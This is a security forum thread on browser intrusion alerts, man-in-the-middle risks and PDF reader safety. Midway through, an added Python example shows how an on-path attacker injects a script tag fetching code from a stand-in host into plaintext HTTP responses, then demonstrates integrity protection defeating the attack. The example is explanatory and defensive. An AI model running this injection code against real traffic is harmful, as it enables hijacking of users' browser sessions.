giants8058

Level 4
If those browser intrusion alerts are legitimate, then that means that there is an active infection already on your system... ;)

Banking trojans and other financial malware just don't run from a webpage inside your browser without touching your system - they're actually installed onto your system.

You better get someone to either check out those HMP.A alerts or take a look at your system.
Yeah I did. Sent Surfright the logs and they said all was good. I was skeptical at first, but they assured me it was OK. The browser border went back to green after close/re-open. There were a couple of times where I was literally doing nothing but had the browser window open, and I got the alert. I was thinking it was FP, but I couldn't tell for sure. I recently did a full wipe and reinstall and after that I received one alert. I know for sure my system was clean at the time. Is it possible that a MITM attack on an active session could inject code that could affect the browser itself, or would only the data streams be compromised?

Handsome Recluse

Level 21
Verified
@Arequire Maybe they're trying to force good habits on businesses like they did with UAC and developers. App and OS updates are in the top 4 mitigation strategies in asd.gov.au after all.

509322

only the data streams
For MitM the chumps want to intercept your packets and have a "look-see". Use a VPN as a counter-measure if that worries you. If you don't do heavy online financial activities, then don't worry about it.

As for the other stuff it would be, for example, if they get you to a webpage and tamper with the browser or one of its processes to exploit a vulnerability and obtain escalation of privilege. That's why you're using HMP.A - to prevent this sort of thing from happening.
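The distinction drawn in the post above (an intercepted data stream versus code that reaches the browser) can be made concrete. The following is an added example, not code from the thread or from any of its posters: it rewrites a plaintext HTTP response in transit the way an on-path attacker would, which is exactly how "only the data streams" becomes script executing in the victim's browser, and then shows why the same edit fails against an integrity-protected channel. The sample response, the injected script, the host `attacker.invalid` and the HMAC key are all constructed for illustration; the HMAC is a stand-in for the per-record integrity check that TLS performs, not TLS itself.

```python
"""Added example (not from the thread): a MitM rewriting a plaintext HTTP
response to inject script, and the same edit failing once the response is
integrity-protected. All inputs are constructed; the HMAC stands in for the
record-level MAC/AEAD tag that TLS carries, it is not TLS."""
import hashlib
import hmac

# Constructed sample: a plaintext HTTP/1.1 response as seen on port 80.
# Content-Length matches the body exactly, as a real server would send it.
BODY = b"<html><body><h1>Your balance: $1,234.56</h1></body></html>"
PLAINTEXT_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"\r\n" + BODY
)

# Constructed payload; attacker.invalid is a reserved, non-resolving name.
INJECTED = b"<script src='http://attacker.invalid/x.js'></script>"


def split_response(raw: bytes):
    """Split a raw HTTP response into (status line, [[name, value], ...], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append([name.strip(), value.strip()])
    return lines[0], headers, body


def set_header(headers, name: bytes, value: bytes) -> None:
    """Replace a header value case-insensitively, or append it if absent."""
    for h in headers:
        if h[0].lower() == name.lower():
            h[1] = value
            return
    headers.append([name, value])


def inject_into_http_response(raw: bytes, payload: bytes) -> bytes:
    """Insert `payload` just before </body> and fix Content-Length so the
    browser accepts the modified body as if the server had sent it.
    Responses with no </body> are passed through untouched."""
    status, headers, body = split_response(raw)
    marker = b"</body>"
    if marker not in body:
        return raw
    new_body = body.replace(marker, payload + marker, 1)
    set_header(headers, b"Content-Length", str(len(new_body)).encode())
    head = b"\r\n".join([status] + [k + b": " + v for k, v in headers])
    return head + b"\r\n\r\n" + new_body


# --- Integrity-protected channel (stand-in for TLS record integrity) ---
KEY = b"constructed-session-key"  # in TLS this would come from the handshake
TAG_LEN = hashlib.sha256().digest_size


def protect(raw: bytes, key: bytes = KEY) -> bytes:
    """Append an HMAC-SHA256 tag over the whole response."""
    return raw + hmac.new(key, raw, hashlib.sha256).digest()


def verify(protected: bytes, key: bytes = KEY):
    """Return the inner response if the tag checks out, else None
    (a TLS stack would abort the connection here)."""
    raw, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    expected = hmac.new(key, raw, hashlib.sha256).digest()
    return raw if hmac.compare_digest(tag, expected) else None


def mitm_on_protected(protected: bytes, payload: bytes) -> bytes:
    """The attacker can still edit the inner bytes, but without the key
    cannot recompute the tag, so the old tag is left in place."""
    raw, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    return inject_into_http_response(raw, payload) + tag


if __name__ == "__main__":
    tampered = inject_into_http_response(PLAINTEXT_RESPONSE, INJECTED)
    print(tampered.decode())
    print("protected channel accepts tampered copy:",
          verify(mitm_on_protected(protect(PLAINTEXT_RESPONSE), INJECTED)) is not None)
```

The plaintext case needs no vulnerability in the browser at all: the page the browser renders is simply not the page the server sent, and the injected script runs with the origin of the legitimate site. That is the practical reason the VPN advice above helps on untrusted networks and the reason HTTPS removes this path entirely.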

Arequire

Level 23
Verified
Content Creator
@Arequire Maybe they're trying to force good habits on businesses like they did with UAC and developers. App and OS updates are in the top 4 mitigation strategies in asd.gov.au after all.
Maybe. Either way I guess businesses will have to adapt to the change. Maybe sysadmins can look at it like one less thing to manage. :p

orthonovum

Level 3
I don't think there are any good free anti-exploits.

If you are on Windows 8 or 10, enable the AppContainer flag in Chrome. That is anti-exploit protection.
And use a safe PDF reader as default, such as Sumatra.
In other words, you will need to do piecemeal exploit protection, or buy HitmanPro.Alert.
BTW... I would not call Sumatra a "safe" PDF reader. In fact I like to use it for priv esc demonstrations ;)

509322

BTW... I would not call Sumatra a "safe" PDF reader. In fact I like to use it for priv esc demonstrations ;)
Sumatra is a safe PDF reader in that most of the functionality is ripped out of it to thwart malicious/weaponized PDFs.

You can use just about any process to elevate privileges so it is not something inherently wrong or different with Sumatra.

orthonovum

Level 3
Sumatra is a safe PDF reader in that most of the functionality is ripped out of it to thwart malicious/weaponized PDFs.

You can use just about any process to elevate privileges so it is not something inherently wrong or different with Sumatra.
I'm not sure that is a 100% true statement ;) but ok

509322

I'm not sure that is a 100% true statement ;) but ok
If you have a Sumatra PDF exploit, then please demonstrate it to the community. There have been exploits of Sumatra PDF reported in the past, but only a very few compared to popular PDF readers such as Adobe. Sumatra PDF is a safer bet compared to the much more targeted other PDF readers.

And yes, if you look hard and long enough, you will eventually find vulnerabilities of one sort or another in just about any soft. It is just a matter of time.